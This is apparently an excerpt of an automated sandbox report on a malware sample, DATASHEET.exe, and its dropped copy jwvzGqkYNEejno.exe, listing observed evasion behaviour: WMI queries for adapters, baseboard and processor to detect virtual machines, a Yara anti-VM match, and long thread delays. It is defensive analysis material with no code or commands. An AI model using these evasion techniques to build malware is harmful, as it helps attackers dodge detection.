                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: DATASHEET.exe PID: 7336, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jwvzGqkYNEejno.exe PID: 7876, type: MEMORYSTR
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\DATASHEET.exeMemory allocated: 2AC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeMemory allocated: 2CA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeMemory allocated: 4CA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeMemory allocated: 7F40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeMemory allocated: 8F40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeMemory allocated: 9100000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeMemory allocated: A100000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeMemory allocated: 2620000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeMemory allocated: 2870000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeMemory allocated: 2770000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeMemory allocated: 7590000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeMemory allocated: 8590000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeMemory allocated: 8740000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeMemory allocated: 9740000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7812Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 464Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7364Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 632Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 800Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1191Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1918
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7923
                    Source: C:\Users\user\Desktop\DATASHEET.exe TID: 7360Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7704Thread sleep count: 7812 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7872Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7700Thread sleep count: 464 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7792Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7900Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7816Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exe TID: 7992Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\DATASHEET.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99734Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99625Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99515Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99406Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99293Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99172Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99062Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98953Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98844Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99534
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99413
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99240
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99076
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98962
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98811
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98703
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98594
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98485
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98360
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98235
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98110
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97985
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97860
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97746
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97625
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97515
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97406
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97297
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97187
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97078
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96968
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96860
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96735
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96475
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96323
